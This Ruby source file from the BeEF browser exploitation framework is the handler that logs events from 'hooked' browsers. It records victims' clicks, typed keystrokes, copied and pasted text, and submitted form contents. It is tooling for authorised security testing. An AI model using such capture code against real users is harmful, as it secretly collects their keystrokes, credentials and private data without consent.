1
#
2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
module BeEF
7
  module Extension
8
    module Events
9
      #
10
      # The http handler that manages the Events.
11
      #
12
      class Handler
13
        HB = BeEF::Core::Models::HookedBrowser
14

15
        def initialize(data)
16
          @data = data
17
          setup
18
        end
19

20
        def setup
21
          beef_hook = @data['beefhook'] || nil
22

23
          unless BeEF::Filters.is_valid_hook_session_id?(beef_hook)
24
            print_error('[Event Logger] Invalid hooked browser session')
25
            return
26
          end
27

28
          # validates that a hooked browser with the beef_hook token exists in the db
29
          zombie = HB.where(session: beef_hook).first || nil
30
          if zombie.nil?
31
            print_error('[Event Logger] Invalid beef hook id: the hooked browser cannot be found in the database')
32
            return
33
          end
34

35
          events = @data['results'] || nil
36

37
          unless events.is_a?(Array)
38
            print_error("[Event Logger] Received event data of type #{events.class}; expected Array")
39
            return
40
          end
41

42
          # push events to logger
43
          logger = BeEF::Core::Logger.instance
44
          events.each do |event|
45
            unless event.is_a?(Hash)
46
              print_error("[Event Logger] Received event data of type #{event.class}; expected Hash")
47
              next
48
            end
49

50
            if event['type'].nil?
51
              print_error("[Event Logger] Received event with no type: #{event.inspect}")
52
              next
53
            end
54

55
            data = event_log_string(event)
56

57
            next if data.nil?
58

59
            logger.register('Event', data, zombie.id)
60
          end
61
        end
62

63
        private
64

65
        def event_log_string(event)
66
          return unless event.is_a?(Hash)
67

68
          event_type = event['type']
69

70
          return if event_type.nil?
71

72
          case event_type
73
          when 'click'
74
            result = "#{event['time']}s - [Mouse Click] x: #{event['x']} y:#{event['y']} > #{event['target']}"
75
          when 'focus'
76
            result = "#{event['time']}s - [Focus] Browser window has regained focus."
77
          when 'copy'
78
            result = "#{event['time']}s - [User Copied Text] \"#{event['data']}\""
79
          when 'cut'
80
            result = "#{event['time']}s - [User Cut Text] \"#{event['data']}\""
81
          when 'paste'
82
            result = "#{event['time']}s - [User Pasted Text] \"#{event['data']}\""
83
          when 'blur'
84
            result = "#{event['time']}s - [Blur] Browser window has lost focus."
85
          when 'console'
86
            result = "#{event['time']}s - [Console] #{event['data']}"
87
          when 'keys'
88
            print_debug "+++++++++++++++++ Key mods: #{event['mods']}"
89
            print_debug "EventData: #{event['data']}"
90

91
            result = "#{event['time']}s - [User Typed] #{event['data']}"
92
            if event['mods'].size.positive?
93
              result += " (modifiers: #{event['mods']})"
94
            end
95
          when 'submit'
96
            result = "#{event['time']}s - [Form Submitted] \"#{event['data']}\" > #{event['target']}"
97
          else
98
            print_debug("[Event Logger] Event handler has received event of unknown type '#{event_type}'")
99
            result = "#{event['time']}s - Unknown event '#{event_type}'"
100
          end
101

102
          result
103
        end
104
      end
105
    end
106
  end
107
end
108

109